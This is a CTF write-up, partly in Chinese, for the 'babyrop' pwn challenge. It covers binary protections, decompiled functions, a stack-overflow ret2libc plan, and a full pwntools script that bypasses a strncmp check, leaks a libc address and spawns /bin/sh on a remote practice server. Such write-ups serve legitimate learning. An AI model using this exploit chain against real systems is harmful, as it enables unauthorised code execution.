HugeH4rD

[OGeek2019]babyrop

Ubuntu 16

https://github.com/196011564/CTFQuestion/raw/master/OPPO_OGEEK/pwn/babyrop/libc-2.23.so

---

0x01

---

checksec

[*] '/home/zelas/Desktop/pwn/[OGeek2019]babyrop/pwn'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled	//栈不可执行
    PIE:      No PIE (0x8048000)

IDA

main()

int __cdecl main()
{
  int buf; // [esp+4h] [ebp-14h] BYREF
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]

  sub_80486BB();
  fd = open("/dev/urandom", 0);
  if ( fd > 0 )
    read(fd, &buf, 4u);
  v2 = sub_804871F(buf);
  sub_80487D0(v2);
  return 0;
}

sub_804871F()

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char buf[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  ssize_t v5; // [esp+4Ch] [ebp-Ch]

  memset(s, 0, sizeof(s));
  memset(buf, 0, sizeof(buf));
  sprintf(s, "%ld", a1);
  v5 = read(0, buf, 0x20u);
  buf[v5 - 1] = 0;
  v1 = strlen(buf);	//\x00中断strlen,防止下方的exit()
  if ( strncmp(buf, s, v1) )
    exit(0);
  write(1, "Correct\n", 8u);	//此处泄露read()的地址
  return (unsigned __int8)buf[7];
}

sub_80487D0( )

ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf[231]; // [esp+11h] [ebp-E7h] BYREF

  if ( a1 == 127 )
    result = read(0, buf, 0xC8u);	\\read()函数存在溢出漏洞
  else
    result = read(0, buf, a1);
  return result;
}

0x02

---

思路 ret2libc

1.\x00跳过strncmp()

2.泄露write()地址

3.计算system 和str_bin_sh的地址

4.执行sytem

s	0xE7H
ebp	0x4
ret	put_plt
put_ret	main()
arg	read_got

s	0xE7H
ebp	0x4
ret	system
sys_ret	0xdeadbeef
arg	bin_sh

0x03

---

from pwn import *
from LibcSearcher import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 29506)
# io = process(['./pwn'])
elf = ELF('pwn')
payload1 = b'\0' * 7 + b'\xff'
io.sendline(payload1)
io.recvuntil(b'Correct\n')

padding = 0xe7 + 0x4
write_got = elf.got['write']
puts_plt = elf.plt['puts']
main_addr = 0x8048825
payload = b'a' * padding + p32(puts_plt) + p32(main_addr) + p32(write_got)
io.sendline(payload)
write_addr = u32(io.recv(4))
print('[+] write_addr', hex(write_addr))

# libc = LibcSearcher('write', write_addr)
# libc_base = write_addr - libc.dump('write')
# system = libc.dump('system') + libc_base
# bin_sh = libc.dump('str_bin_sh') + libc_base

libc = ELF('libc-2.23.so')
libc_base = write_addr - libc.sym['write']
system = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()
print('[+] libc_base', hex(libc_base))
print('[+] system_addr', hex(system))
print('[+] bin_sh_addr', hex(bin_sh))

io.sendline(payload1)
io.recvline()
payload = b'a' * padding + p32(system) + p32(0xdeadbeef) + p32(bin_sh)
io.sendline(payload)

io.interactive()